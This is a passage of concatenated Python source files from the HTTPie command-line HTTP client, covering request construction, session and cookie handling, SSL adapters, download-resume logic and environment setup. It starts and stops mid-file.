f'Set-Cookie: {cookie}' for header, value in original.headers.items() for cookie in split_cookies(value) if header == 'Set-Cookie' ) return '\r\n'.join(headers) @property def metadata(self) -> str: data = {} time_to_parse_headers = self._orig.elapsed.total_seconds() # noinspection PyProtectedMember time_since_headers_parsed = monotonic() - self._orig._httpie_headers_parsed_at time_elapsed = time_to_parse_headers + time_since_headers_parsed # data['Headers time'] = str(round(time_to_parse_headers, 5)) + 's' # data['Body time'] = str(round(time_since_headers_parsed, 5)) + 's' data[ELAPSED_TIME_LABEL] = str(round(time_elapsed, 10)) + 's' return '\n'.join( f'{key}: {value}' for key, value in data.items() ) @property def version(self) -> str: """ Return the HTTP version used by the server, e.g. '1.1'. Assume HTTP/1.1 if version is not available. """ mapping = { 9: '0.9', 10: '1.0', 11: '1.1', 20: '2.0', } fallback = 11 version = None try: raw = self._orig.raw if getattr(raw, '_original_response', None): version = raw._original_response.version else: version = raw.version except AttributeError: pass return mapping[version or fallback] class HTTPRequest(HTTPMessage): """A :class:`requests.models.Request` wrapper.""" def iter_body(self, chunk_size): yield self.body def iter_lines(self, chunk_size): yield self.body, b'' @property def headers(self): url = urlsplit(self._orig.url) request_line = '{method} {path}{query} HTTP/1.1'.format( method=self._orig.method, path=url.path or '/', query=f'?{url.query}' if url.query else '' ) headers = self._orig.headers.copy() if 'Host' not in self._orig.headers: headers['Host'] = url.netloc.split('@')[-1] headers = [ f'{name}: {value if isinstance(value, str) else value.decode()}' for name, value in headers.items() if not (name.lower() in SKIPPABLE_HEADERS and value == SKIP_HEADER) ] headers.insert(0, request_line) headers = '\r\n'.join(headers).strip() return headers @property def body(self): body = self._orig.body if isinstance(body, str): # Happens with JSON/form request data parsed from the command line. body = body.encode() return body or b'' RequestsMessage = Union[requests.PreparedRequest, requests.Response] class RequestsMessageKind(Enum): REQUEST = auto() RESPONSE = auto() def infer_requests_message_kind(message: RequestsMessage) -> RequestsMessageKind: if isinstance(message, requests.PreparedRequest): return RequestsMessageKind.REQUEST elif isinstance(message, requests.Response): return RequestsMessageKind.RESPONSE else: raise TypeError(f"Unexpected message type: {type(message).__name__}") OPTION_TO_PARAM = { RequestsMessageKind.REQUEST: { 'headers': OUT_REQ_HEAD, 'body': OUT_REQ_BODY, }, RequestsMessageKind.RESPONSE: { 'headers': OUT_RESP_HEAD, 'body': OUT_RESP_BODY, 'meta': OUT_RESP_META } } class OutputOptions(NamedTuple): kind: RequestsMessageKind headers: bool body: bool meta: bool = False def any(self): return ( self.headers or self.body or self.meta ) @classmethod def from_message( cls, message: RequestsMessage, raw_args: str = '', **kwargs ): kind = infer_requests_message_kind(message) options = { option: param in raw_args for option, param in OPTION_TO_PARAM[kind].items() } options.update(kwargs) return cls( kind=kind, **options ) File: httpie/client.py import argparse import http.client import json import sys from contextlib import contextmanager from time import monotonic from typing import Any, Dict, Callable, Iterable from urllib.parse import urlparse, urlunparse import requests # noinspection PyPackageRequirements import urllib3 from urllib3.util import SKIP_HEADER, SKIPPABLE_HEADERS from . import __version__ from .adapters import HTTPieHTTPAdapter from .cli.constants import HTTP_OPTIONS from .cli.dicts import HTTPHeadersDict from .cli.nested_json import unwrap_top_level_list_if_needed from .context import Environment from .encoding import UTF8 from .models import RequestsMessage from .plugins.registry import plugin_manager from .sessions import get_httpie_session from .ssl_ import AVAILABLE_SSL_VERSION_ARG_MAPPING, HTTPieCertificate, HTTPieHTTPSAdapter from .uploads import ( compress_request, prepare_request_body, get_multipart_data_and_content_type, ) from .utils import get_expired_cookies, repr_dict urllib3.disable_warnings() FORM_CONTENT_TYPE = f'application/x-www-form-urlencoded; charset={UTF8}' JSON_CONTENT_TYPE = 'application/json' JSON_ACCEPT = f'{JSON_CONTENT_TYPE}, */*;q=0.5' DEFAULT_UA = f'HTTPie/{__version__}' IGNORE_CONTENT_LENGTH_METHODS = frozenset([HTTP_OPTIONS]) def collect_messages( env: Environment, args: argparse.Namespace, request_body_read_callback: Callable[[bytes], None] = None, ) -> Iterable[RequestsMessage]: httpie_session = None httpie_session_headers = None if args.session or args.session_read_only: httpie_session = get_httpie_session( env=env, config_dir=env.config.directory, session_name=args.session or args.session_read_only, host=args.headers.get('Host'), url=args.url, ) httpie_session_headers = httpie_session.headers request_kwargs = make_request_kwargs( env, args=args, base_headers=httpie_session_headers, request_body_read_callback=request_body_read_callback ) send_kwargs = make_send_kwargs(args) send_kwargs_mergeable_from_env = make_send_kwargs_mergeable_from_env(args) requests_session = build_requests_session( ssl_version=args.ssl_version, ciphers=args.ciphers, verify=bool(send_kwargs_mergeable_from_env['verify']) ) if httpie_session: httpie_session.update_headers(request_kwargs['headers']) requests_session.cookies = httpie_session.cookies if args.auth_plugin: # Save auth from CLI to HTTPie session. httpie_session.auth = { 'type': args.auth_plugin.auth_type, 'raw_auth': args.auth_plugin.raw_auth, } elif httpie_session.auth: # Apply auth from HTTPie session request_kwargs['auth'] = httpie_session.auth if args.debug: # TODO: reflect the split between request and send kwargs. dump_request(request_kwargs) request = requests.Request(**request_kwargs) prepared_request = requests_session.prepare_request(request) transform_headers(request, prepared_request) if args.path_as_is: prepared_request.url = ensure_path_as_is( orig_url=args.url, prepped_url=prepared_request.url, ) if args.compress and prepared_request.body: compress_request( request=prepared_request, always=args.compress > 1, ) response_count = 0 expired_cookies = [] while prepared_request: yield prepared_request if not args.offline: send_kwargs_merged = requests_session.merge_environment_settings( url=prepared_request.url, **send_kwargs_mergeable_from_env, ) with max_headers(args.max_headers): response = requests_session.send( request=prepared_request, **send_kwargs_merged, **send_kwargs, ) response._httpie_headers_parsed_at = monotonic() expired_cookies += get_expired_cookies( response.headers.get('Set-Cookie', '') ) response_count += 1 if response.next: if args.max_redirects and response_count == args.max_redirects: raise requests.TooManyRedirects if args.follow: prepared_request = response.next if args.all: yield response continue yield response break if httpie_session: if httpie_session.is_new() or not args.session_read_only: httpie_session.cookies = requests_session.cookies httpie_session.remove_cookies(expired_cookies) httpie_session.save() # noinspection PyProtectedMember @contextmanager def max_headers(limit): # <https://github.com/httpie/cli/issues/802> # noinspection PyUnresolvedReferences orig = http.client._MAXHEADERS http.client._MAXHEADERS = limit or float('Inf') try: yield finally: http.client._MAXHEADERS = orig def build_requests_session( verify: bool, ssl_version: str = None, ciphers: str = None, ) -> requests.Session: requests_session = requests.Session() # Install our adapter. http_adapter = HTTPieHTTPAdapter() https_adapter = HTTPieHTTPSAdapter( ciphers=ciphers, verify=verify, ssl_version=( AVAILABLE_SSL_VERSION_ARG_MAPPING[ssl_version] if ssl_version else None ), ) requests_session.mount('http://', http_adapter) requests_session.mount('https://', https_adapter) # Install adapters from plugins. for plugin_cls in plugin_manager.get_transport_plugins(): transport_plugin = plugin_cls() requests_session.mount( prefix=transport_plugin.prefix, adapter=transport_plugin.get_adapter(), ) return requests_session def dump_request(kwargs: dict): sys.stderr.write( f'\n>>> requests.request(**{repr_dict(kwargs)})\n\n') def finalize_headers(headers: HTTPHeadersDict) -> HTTPHeadersDict: final_headers = HTTPHeadersDict() for name, value in headers.items(): if value is not None: # “leading or trailing LWS MAY be removed without # changing the semantics of the field value” # <https://www.w3.org/Protocols/rfc2616/rfc2616-sec4.html> # Also, requests raises `InvalidHeader` for leading spaces. value = value.strip() if isinstance(value, str): # See <https://github.com/httpie/cli/issues/212> value = value.encode() elif name.lower() in SKIPPABLE_HEADERS: # Some headers get overwritten by urllib3 when set to `None` # and should be replaced with the `SKIP_HEADER` constant. value = SKIP_HEADER final_headers.add(name, value) return final_headers def transform_headers( request: requests.Request, prepared_request: requests.PreparedRequest ) -> None: """Apply various transformations on top of the `prepared_requests`'s headers to change the request prepreation behavior.""" # Remove 'Content-Length' when it is misplaced by requests. if ( prepared_request.method in IGNORE_CONTENT_LENGTH_METHODS and prepared_request.headers.get('Content-Length') == '0' and request.headers.get('Content-Length') != '0' ): prepared_request.headers.pop('Content-Length') apply_missing_repeated_headers( request.headers, prepared_request ) def apply_missing_repeated_headers( original_headers: HTTPHeadersDict, prepared_request: requests.PreparedRequest ) -> None: """Update the given `prepared_request`'s headers with the original ones. This allows the requests to be prepared as usual, and then later merged with headers that are specified multiple times.""" new_headers = HTTPHeadersDict(prepared_request.headers) for prepared_name, prepared_value in prepared_request.headers.items(): if prepared_name not in original_headers: continue original_keys, original_values = zip(*filter( lambda item: item[0].casefold() == prepared_name.casefold(), original_headers.items() )) if prepared_value not in original_values: # If the current value is not among the initial values # set for this field, then it means that this field got # overridden on the way, and we should preserve it. continue new_headers.popone(prepared_name) new_headers.update(zip(original_keys, original_values)) prepared_request.headers = new_headers def make_default_headers(args: argparse.Namespace) -> HTTPHeadersDict: default_headers = HTTPHeadersDict({ 'User-Agent': DEFAULT_UA }) auto_json = args.data and not args.form if args.json or auto_json: default_headers['Accept'] = JSON_ACCEPT if args.json or (auto_json and args.data): default_headers['Content-Type'] = JSON_CONTENT_TYPE elif args.form and not args.files: # If sending files, `requests` will set # the `Content-Type` for us. default_headers['Content-Type'] = FORM_CONTENT_TYPE return default_headers def make_send_kwargs(args: argparse.Namespace) -> dict: return { 'timeout': args.timeout or None, 'allow_redirects': False, } def make_send_kwargs_mergeable_from_env(args: argparse.Namespace) -> dict: cert = None if args.cert: cert = args.cert if args.cert_key: # Having a client certificate key passphrase is not supported # by requests. So we are using our own transportation structure # which is compatible with their format (a tuple of minimum two # items). # # See: https://github.com/psf/requests/issues/2519 cert = HTTPieCertificate(cert, args.cert_key, args.cert_key_pass.value) return { 'proxies': {p.key: p.value for p in args.proxy}, 'stream': True, 'verify': { 'yes': True, 'true': True, 'no': False, 'false': False, }.get(args.verify.lower(), args.verify), 'cert': cert, } def json_dict_to_request_body(data: Dict[str, Any]) -> str: data = unwrap_top_level_list_if_needed(data) if data: data = json.dumps(data) else: # We need to set data to an empty string to prevent requests # from assigning an empty list to `response.request.data`. data = '' return data def make_request_kwargs( env: Environment, args: argparse.Namespace, base_headers: HTTPHeadersDict = None, request_body_read_callback=lambda chunk: chunk ) -> dict: """ Translate our `args` into `requests.Request` keyword arguments. """ files = args.files # Serialize JSON data, if needed. data = args.data auto_json = data and not args.form if (args.json or auto_json) and isinstance(data, dict): data = json_dict_to_request_body(data) # Finalize headers. headers = make_default_headers(args) if base_headers: headers.update(base_headers) headers.update(args.headers) if args.offline and args.chunked and 'Transfer-Encoding' not in headers: # When online, we let requests set the header instead to be able more # easily verify chunking is taking place. headers['Transfer-Encoding'] = 'chunked' headers = finalize_headers(headers) if (args.form and files) or args.multipart: data, headers['Content-Type'] = get_multipart_data_and_content_type( data=args.multipart_data, boundary=args.boundary, content_type=args.headers.get('Content-Type'), ) return { 'method': args.method.lower(), 'url': args.url, 'headers': headers, 'data': prepare_request_body( env, data, body_read_callback=request_body_read_callback, chunked=args.chunked, offline=args.offline, content_length_header_value=headers.get('Content-Length'), ), 'auth': args.auth, 'params': args.params.items(), } def ensure_path_as_is(orig_url: str, prepped_url: str) -> str: """ Handle `--path-as-is` by replacing the path component of the prepared URL with the path component from the original URL. Other parts stay untouched because other (welcome) processing on the URL might have taken place. <https://github.com/httpie/cli/issues/895> <https://ec.haxx.se/http/http-basics#path-as-is> <https://curl.haxx.se/libcurl/c/CURLOPT_PATH_AS_IS.html> >>> ensure_path_as_is('http://foo/../', 'http://foo/?foo=bar') 'http://foo/../?foo=bar' """ parsed_orig, parsed_prepped = urlparse(orig_url), urlparse(prepped_url) final_dict = { # noinspection PyProtectedMember **parsed_prepped._asdict(), 'path': parsed_orig.path, } return urlunparse(tuple(final_dict.values())) File: httpie/__init__.py """ HTTPie: modern, user-friendly command-line HTTP client for the API era. """ __version__ = '3.2.3' __date__ = '2024-07-10' __author__ = 'Jakub Roztocil' __licence__ = 'BSD' File: httpie/core.py import argparse import os import platform import sys import socket from typing import List, Optional, Union, Callable import requests from pygments import __version__ as pygments_version from requests import __version__ as requests_version from . import __version__ as httpie_version from .cli.constants import OUT_REQ_BODY from .cli.nested_json import NestedJSONSyntaxError from .client import collect_messages from .context import Environment, LogLevel from .downloads import Downloader from .models import ( RequestsMessageKind, OutputOptions ) from .output.models import ProcessingOptions from .output.writer import write_message, write_stream, write_raw_data, MESSAGE_SEPARATOR_BYTES from .plugins.registry import plugin_manager from .status import ExitStatus, http_status_to_exit_status from .utils import unwrap_context from .internal.update_warnings import check_updates from .internal.daemon_runner import is_daemon_mode, run_daemon_task # noinspection PyDefaultArgument def raw_main( parser: argparse.ArgumentParser, main_program: Callable[[argparse.Namespace, Environment], ExitStatus], args: List[Union[str, bytes]] = sys.argv, env: Environment = Environment(), use_default_options: bool = True, ) -> ExitStatus: program_name, *args = args env.program_name = os.path.basename(program_name) args = decode_raw_args(args, env.stdin_encoding) if is_daemon_mode(args): return run_daemon_task(env, args) plugin_manager.load_installed_plugins(env.config.plugins_dir) if use_default_options and env.config.default_options: args = env.config.default_options + args include_debug_info = '--debug' in args include_traceback = include_debug_info or '--traceback' in args def handle_generic_error(e, annotation=None): msg = str(e) if hasattr(e, 'request'): request = e.request if hasattr(request, 'url'): msg = ( f'{msg} while doing a {request.method}' f' request to URL: {request.url}' ) if annotation: msg += annotation env.log_error(f'{type(e).__name__}: {msg}') if include_traceback: raise if include_debug_info: print_debug_info(env) if args == ['--debug']: return ExitStatus.SUCCESS exit_status = ExitStatus.SUCCESS try: parsed_args = parser.parse_args( args=args, env=env, ) except NestedJSONSyntaxError as exc: env.stderr.write(str(exc) + "\n") if include_traceback: raise exit_status = ExitStatus.ERROR except KeyboardInterrupt: env.stderr.write('\n') if include_traceback: raise exit_status = ExitStatus.ERROR_CTRL_C except SystemExit as e: if e.code != ExitStatus.SUCCESS: env.stderr.write('\n') if include_traceback: raise exit_status = ExitStatus.ERROR else: check_updates(env) try: exit_status = main_program( args=parsed_args, env=env, ) except KeyboardInterrupt: env.stderr.write('\n') if include_traceback: raise exit_status = ExitStatus.ERROR_CTRL_C except SystemExit as e: if e.code != ExitStatus.SUCCESS: env.stderr.write('\n') if include_traceback: raise exit_status = ExitStatus.ERROR except requests.Timeout: exit_status = ExitStatus.ERROR_TIMEOUT env.log_error(f'Request timed out ({parsed_args.timeout}s).') except requests.TooManyRedirects: exit_status = ExitStatus.ERROR_TOO_MANY_REDIRECTS env.log_error( f'Too many redirects' f' (--max-redirects={parsed_args.max_redirects}).' ) except requests.exceptions.ConnectionError as exc: annotation = None original_exc = unwrap_context(exc) if isinstance(original_exc, socket.gaierror): if original_exc.errno == socket.EAI_AGAIN: annotation = '\nCouldn’t connect to a DNS server. Please check your connection and try again.' elif original_exc.errno == socket.EAI_NONAME: annotation = '\nCouldn’t resolve the given hostname. Please check the URL and try again.' propagated_exc = original_exc else: propagated_exc = exc handle_generic_error(propagated_exc, annotation=annotation) exit_status = ExitStatus.ERROR except Exception as e: # TODO: Further distinction between expected and unexpected errors. handle_generic_error(e) exit_status = ExitStatus.ERROR return exit_status def main( args: List[Union[str, bytes]] = sys.argv, env: Environment = Environment() ) -> ExitStatus: """ The main function. Pre-process args, handle some special types of invocations, and run the main program with error handling. Return exit status code. """ from .cli.definition import parser return raw_main( parser=parser, main_program=program, args=args, env=env ) def program(args: argparse.Namespace, env: Environment) -> ExitStatus: """ The main program without error handling. """ # TODO: Refactor and drastically simplify, especially so that the separator logic is elsewhere. exit_status = ExitStatus.SUCCESS downloader = None initial_request: Optional[requests.PreparedRequest] = None final_response: Optional[requests.Response] = None processing_options = ProcessingOptions.from_raw_args(args) def separate(): getattr(env.stdout, 'buffer', env.stdout).write(MESSAGE_SEPARATOR_BYTES) def request_body_read_callback(chunk: bytes): should_pipe_to_stdout = bool( # Request body output desired OUT_REQ_BODY in args.output_options # & not `.read()` already pre-request (e.g., for compression) and initial_request # & non-EOF chunk and chunk ) if should_pipe_to_stdout: return write_raw_data( env, chunk, processing_options=processing_options, headers=initial_request.headers ) try: if args.download: args.follow = True # --download implies --follow. downloader = Downloader(env, output_file=args.output_file, resume=args.download_resume) downloader.pre_request(args.headers) messages = collect_messages(env, args=args, request_body_read_callback=request_body_read_callback) force_separator = False prev_with_body = False # Process messages as they’re generated for message in messages: output_options = OutputOptions.from_message(message, args.output_options) do_write_body = output_options.body if prev_with_body and output_options.any() and (force_separator or not env.stdout_isatty): # Separate after a previous message with body, if needed. See test_tokens.py. separate() force_separator = False if output_options.kind is RequestsMessageKind.REQUEST: if not initial_request: initial_request = message if output_options.body: is_streamed_upload = not isinstance(message.body, (str, bytes)) do_write_body = not is_streamed_upload force_separator = is_streamed_upload and env.stdout_isatty else: final_response = message if args.check_status or downloader: exit_status = http_status_to_exit_status(http_status=message.status_code, follow=args.follow) if exit_status != ExitStatus.SUCCESS and (not env.stdout_isatty or args.quiet == 1): env.log_error(f'HTTP {message.raw.status} {message.raw.reason}', level=LogLevel.WARNING) write_message( requests_message=message, env=env, output_options=output_options._replace( body=do_write_body ), processing_options=processing_options ) prev_with_body = output_options.body # Cleanup if force_separator: separate() if downloader and exit_status == ExitStatus.SUCCESS: # Last response body download. download_stream, download_to = downloader.start( initial_url=initial_request.url, final_response=final_response, ) write_stream(stream=download_stream, outfile=download_to, flush=False) downloader.finish() if downloader.interrupted: exit_status = ExitStatus.ERROR env.log_error( f'Incomplete download: size={downloader.status.total_size};' f' downloaded={downloader.status.downloaded}' ) return exit_status finally: if downloader and not downloader.finished: downloader.failed() if args.output_file and args.output_file_specified: args.output_file.close() def print_debug_info(env: Environment): env.stderr.writelines([ f'HTTPie {httpie_version}\n', f'Requests {requests_version}\n', f'Pygments {pygments_version}\n', f'Python {sys.version}\n{sys.executable}\n', f'{platform.system()} {platform.release()}', ]) env.stderr.write('\n\n') env.stderr.write(repr(env)) env.stderr.write('\n\n') env.stderr.write(repr(plugin_manager)) env.stderr.write('\n') def decode_raw_args( args: List[Union[str, bytes]], stdin_encoding: str ) -> List[str]: """ Convert all bytes args to str by decoding them using stdin encoding. """ return [ arg.decode(stdin_encoding) if type(arg) is bytes else arg for arg in args ] File: httpie/ssl_.py import ssl from typing import NamedTuple, Optional from httpie.adapters import HTTPAdapter # noinspection PyPackageRequirements from urllib3.util.ssl_ import ( create_urllib3_context, resolve_ssl_version, ) SSL_VERSION_ARG_MAPPING = { 'ssl2.3': 'PROTOCOL_SSLv23', 'ssl3': 'PROTOCOL_SSLv3', 'tls1': 'PROTOCOL_TLSv1', 'tls1.1': 'PROTOCOL_TLSv1_1', 'tls1.2': 'PROTOCOL_TLSv1_2', 'tls1.3': 'PROTOCOL_TLSv1_3', } AVAILABLE_SSL_VERSION_ARG_MAPPING = { arg: getattr(ssl, constant_name) for arg, constant_name in SSL_VERSION_ARG_MAPPING.items() if hasattr(ssl, constant_name) } class HTTPieCertificate(NamedTuple): cert_file: Optional[str] = None key_file: Optional[str] = None key_password: Optional[str] = None def to_raw_cert(self): """Synthesize a requests-compatible (2-item tuple of cert and key file) object from HTTPie's internal representation of a certificate.""" return (self.cert_file, self.key_file) class HTTPieHTTPSAdapter(HTTPAdapter): def __init__( self, verify: bool, ssl_version: str = None, ciphers: str = None, **kwargs ): self._ssl_context = self._create_ssl_context( verify=verify, ssl_version=ssl_version, ciphers=ciphers, ) super().__init__(**kwargs) def init_poolmanager(self, *args, **kwargs): kwargs['ssl_context'] = self._ssl_context return super().init_poolmanager(*args, **kwargs) def proxy_manager_for(self, *args, **kwargs): kwargs['ssl_context'] = self._ssl_context return super().proxy_manager_for(*args, **kwargs) def cert_verify(self, conn, url, verify, cert): if isinstance(cert, HTTPieCertificate): conn.key_password = cert.key_password cert = cert.to_raw_cert() return super().cert_verify(conn, url, verify, cert) @staticmethod def _create_ssl_context( verify: bool, ssl_version: str = None, ciphers: str = None, ) -> 'ssl.SSLContext': return create_urllib3_context( ciphers=ciphers, ssl_version=resolve_ssl_version(ssl_version), # Since we are using a custom SSL context, we need to pass this # here manually, even though it’s also passed to the connection # in `super().cert_verify()`. cert_reqs=ssl.CERT_REQUIRED if verify else ssl.CERT_NONE ) @classmethod def get_default_ciphers_names(cls): return [cipher['name'] for cipher in cls._create_ssl_context(verify=False).get_ciphers()] def _is_key_file_encrypted(key_file): """Detects if a key file is encrypted or not. Copy of the internal urllib function (urllib3.util.ssl_)""" with open(key_file, "r") as f: for line in f: # Look for Proc-Type: 4,ENCRYPTED if "ENCRYPTED" in line: return True return False # We used to import the default set of TLS ciphers from urllib3, but they removed it. # Instead, now urllib3 uses the list of ciphers configured by the system. # <https://github.com/httpie/cli/pull/1501> DEFAULT_SSL_CIPHERS_STRING = ':'.join(HTTPieHTTPSAdapter.get_default_ciphers_names()) File: httpie/downloads.py """ Download mode implementation. """ import mimetypes import os import re from mailbox import Message from time import monotonic from typing import IO, Optional, Tuple from urllib.parse import urlsplit import requests from .models import HTTPResponse, OutputOptions from .output.streams import RawStream from .context import Environment PARTIAL_CONTENT = 206 class ContentRangeError(ValueError): pass def parse_content_range(content_range: str, resumed_from: int) -> int: """ Parse and validate Content-Range header. <https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html> :param content_range: the value of a Content-Range response header eg. "bytes 21010-47021/47022" :param resumed_from: first byte pos. from the Range request header :return: total size of the response body when fully downloaded. """ if content_range is None: raise ContentRangeError('Missing Content-Range') pattern = ( r'^bytes (?P<first_byte_pos>\d+)-(?P<last_byte_pos>\d+)' r'/(\*|(?P<instance_length>\d+))$' ) match = re.match(pattern, content_range) if not match: raise ContentRangeError( f'Invalid Content-Range format {content_range!r}') content_range_dict = match.groupdict() first_byte_pos = int(content_range_dict['first_byte_pos']) last_byte_pos = int(content_range_dict['last_byte_pos']) instance_length = ( int(content_range_dict['instance_length']) if content_range_dict['instance_length'] else None ) # "A byte-content-range-spec with a byte-range-resp-spec whose # last- byte-pos value is less than its first-byte-pos value, # or whose instance-length value is less than or equal to its # last-byte-pos value, is invalid. The recipient of an invalid # byte-content-range- spec MUST ignore it and any content # transferred along with it." if (first_byte_pos > last_byte_pos or (instance_length is not None and instance_length <= last_byte_pos)): raise ContentRangeError( f'Invalid Content-Range returned: {content_range!r}') if (first_byte_pos != resumed_from or (instance_length is not None and last_byte_pos + 1 != instance_length)): # Not what we asked for. raise ContentRangeError( f'Unexpected Content-Range returned ({content_range!r})' f' for the requested Range ("bytes={resumed_from}-")' ) return last_byte_pos + 1 def filename_from_content_disposition( content_disposition: str ) -> Optional[str]: """ Extract and validate filename from a Content-Disposition header. :param content_disposition: Content-Disposition value :return: the filename if present and valid, otherwise `None` """ # attachment; filename=jakubroztocil-httpie-0.4.1-20-g40bd8f6.tar.gz msg = Message(f'Content-Disposition: {content_disposition}') filename = msg.get_filename() if filename: # Basic sanitation. filename = os.path.basename(filename).lstrip('.').strip() if filename: return filename def filename_from_url(url: str, content_type: Optional[str]) -> str: fn = urlsplit(url).path.rstrip('/') fn = os.path.basename(fn) if fn else 'index' if '.' not in fn and content_type: content_type = content_type.split(';')[0] if content_type == 'text/plain': # mimetypes returns '.ksh' ext = '.txt' else: ext = mimetypes.guess_extension(content_type) if ext == '.htm': ext = '.html' if ext: fn += ext return fn def trim_filename(filename: str, max_len: int) -> str: if len(filename) > max_len: trim_by = len(filename) - max_len name, ext = os.path.splitext(filename) if trim_by >= len(name): filename = filename[:-trim_by] else: filename = name[:-trim_by] + ext return filename def get_filename_max_length(directory: str) -> int: max_len = 255 if hasattr(os, 'pathconf') and 'PC_NAME_MAX' in os.pathconf_names: max_len = os.pathconf(directory, 'PC_NAME_MAX') return max_len def trim_filename_if_needed(filename: str, directory='.', extra=0) -> str: max_len = get_filename_max_length(directory) - extra if len(filename) > max_len: filename = trim_filename(filename, max_len) return filename def get_unique_filename(filename: str, exists=os.path.exists) -> str: attempt = 0 while True: suffix = f'-{attempt}' if attempt > 0 else '' try_filename = trim_filename_if_needed(filename, extra=len(suffix)) try_filename += suffix if not exists(try_filename): return try_filename attempt += 1 class Downloader: def __init__( self, env: Environment, output_file: IO = None, resume: bool = False ): """ :param resume: Should the download resume if partial download already exists. :param output_file: The file to store response body in. If not provided, it will be guessed from the response. :param progress_file: Where to report download progress. """ self.finished = False self.status = DownloadStatus(env=env) self._output_file = output_file self._resume = resume self._resumed_from = 0 def pre_request(self, request_headers: dict): """Called just before the HTTP request is sent. Might alter `request_headers`. """ # Ask the server not to encode the content so that we can resume, etc. request_headers['Accept-Encoding'] = 'identity' if self._resume: bytes_have = os.path.getsize(self._output_file.name) if bytes_have: # Set ``Range`` header to resume the download # TODO: Use "If-Range: mtime" to make sure it's fresh? request_headers['Range'] = f'bytes={bytes_have}-' self._resumed_from = bytes_have def start( self, initial_url: str, final_response: requests.Response ) -> Tuple[RawStream, IO]: """ Initiate and return a stream for `response` body with progress callback attached. Can be called only once. :param initial_url: The original requested URL :param final_response: Initiated response object with headers already fetched :return: RawStream, output_file """ assert not self.status.time_started # FIXME: some servers still might sent Content-Encoding: gzip # <https://github.com/httpie/cli/issues/423> try: total_size = int(final_response.headers['Content-Length']) except (KeyError, ValueError, TypeError): total_size = None if not self._output_file: self._output_file = self._get_output_file_from_response( initial_url=initial_url, final_response=final_response, ) else: # `--output, -o` provided if self._resume and final_response.status_code == PARTIAL_CONTENT: total_size = parse_content_range( final_response.headers.get('Content-Range'), self._resumed_from ) else: self._resumed_from = 0 try: self._output_file.seek(0) self._output_file.truncate() except OSError: pass # stdout output_options = OutputOptions.from_message(final_response, headers=False, body=True) stream = RawStream( msg=HTTPResponse(final_response), output_options=output_options, on_body_chunk_downloaded=self.chunk_downloaded, ) self.status.started( output_file=self._output_file, resumed_from=self._resumed_from, total_size=total_size ) return stream, self._output_file def finish(self): assert not self.finished self.finished = True self.status.finished() def failed(self): self.status.terminate() @property def interrupted(self) -> bool: return ( self.finished and self.status.total_size and self.status.total_size != self.status.downloaded ) def chunk_downloaded(self, chunk: bytes): """ A download progress callback. :param chunk: A chunk of response body data that has just been downloaded and written to the output. """ self.status.chunk_downloaded(len(chunk)) @staticmethod def _get_output_file_from_response( initial_url: str, final_response: requests.Response, ) -> IO: # Output file not specified. Pick a name that doesn't exist yet. filename = None if 'Content-Disposition' in final_response.headers: filename = filename_from_content_disposition( final_response.headers['Content-Disposition']) if not filename: filename = filename_from_url( url=initial_url, content_type=final_response.headers.get('Content-Type'), ) unique_filename = get_unique_filename(filename) return open(unique_filename, buffering=0, mode='a+b') class DownloadStatus: """Holds details about the download status.""" def __init__(self, env): self.env = env self.downloaded = 0 self.total_size = None self.resumed_from = 0 self.time_started = None self.time_finished = None def started(self, output_file, resumed_from=0, total_size=None): assert self.time_started is None self.total_size = total_size self.downloaded = self.resumed_from = resumed_from self.time_started = monotonic() self.start_display(output_file=output_file) def start_display(self, output_file): from httpie.output.ui.rich_progress import ( DummyDisplay, StatusDisplay, ProgressDisplay ) message = f'Downloading to {output_file.name}' if self.env.show_displays: if self.total_size is None: # Rich does not support progress bars without a total # size given. Instead we use status objects. self.display = StatusDisplay(self.env) else: self.display = ProgressDisplay(self.env) else: self.display = DummyDisplay(self.env) self.display.start( total=self.total_size, at=self.downloaded, description=message ) def chunk_downloaded(self, size): assert self.time_finished is None self.downloaded += size self.display.update(size) @property def has_finished(self): return self.time_finished is not None @property def time_spent(self): if ( self.time_started is not None and self.time_finished is not None ): return self.time_finished - self.time_started else: return None def finished(self): assert self.time_started is not None assert self.time_finished is None self.time_finished = monotonic() if hasattr(self, 'display'): self.display.stop(self.time_spent) def terminate(self): if hasattr(self, 'display'): self.display.stop(self.time_spent) File: httpie/context.py import argparse import sys import os import warnings from contextlib import contextmanager from pathlib import Path from typing import Iterator, IO, Optional, TYPE_CHECKING from enum import Enum try: import curses except ImportError: curses = None # Compiled w/o curses from .compat import is_windows, cached_property from .config import DEFAULT_CONFIG_DIR, Config, ConfigFileError from .encoding import UTF8 from .utils import repr_dict from .output.ui.palette import GenericColor if TYPE_CHECKING: from rich.console import Console class LogLevel(str, Enum): INFO = 'info' WARNING = 'warning' ERROR = 'error' LOG_LEVEL_COLORS = { LogLevel.INFO: GenericColor.PINK, LogLevel.WARNING: GenericColor.ORANGE, LogLevel.ERROR: GenericColor.RED, } LOG_LEVEL_DISPLAY_THRESHOLDS = { LogLevel.INFO: 1, LogLevel.WARNING: 2, LogLevel.ERROR: float('inf'), # Never hide errors. } class Environment: """ Information about the execution context (standard streams, config directory, etc). By default, it represents the actual environment. All of the attributes can be overwritten though, which is used by the test suite to simulate various scenarios. """ args = argparse.Namespace() is_windows: bool = is_windows config_dir: Path = DEFAULT_CONFIG_DIR stdin: Optional[IO] = sys.stdin # `None` when closed fd (#791) stdin_isatty: bool = stdin.isatty() if stdin else False stdin_encoding: str = None stdout: IO = sys.stdout stdout_isatty: bool = stdout.isatty() stdout_encoding: str = None stderr: IO = sys.stderr stderr_isatty: bool = stderr.isatty() colors = 256 program_name: str = 'http' # Whether to show progress bars / status spinners etc. show_displays: bool = True if not is_windows: if curses: try: curses.setupterm() colors = curses.tigetnum('colors') except curses.error: pass else: # noinspection PyUnresolvedReferences import colorama.initialise stdout = colorama.initialise.wrap_stream( stdout, convert=None, strip=None, autoreset=True, wrap=True ) stderr = colorama.initialise.wrap_stream( stderr, convert=None, strip=None, autoreset=True, wrap=True ) del colorama def __init__(self, devnull=None, **kwargs): """ Use keyword arguments to overwrite any of the class attributes for this instance. """ assert all(hasattr(type(self), attr) for attr in kwargs.keys()) self.__dict__.update(**kwargs) # The original STDERR unaffected by --quiet’ing. self._orig_stderr = self.stderr self._devnull = devnull # Keyword arguments > stream.encoding > default UTF-8 if self.stdin and self.stdin_encoding is None: self.stdin_encoding = getattr( self.stdin, 'encoding', None) or UTF8 if self.stdout_encoding is None: actual_stdout = self.stdout if is_windows: # noinspection PyUnresolvedReferences from colorama import AnsiToWin32 if isinstance(self.stdout, AnsiToWin32): # noinspection PyUnresolvedReferences actual_stdout = self.stdout.wrapped 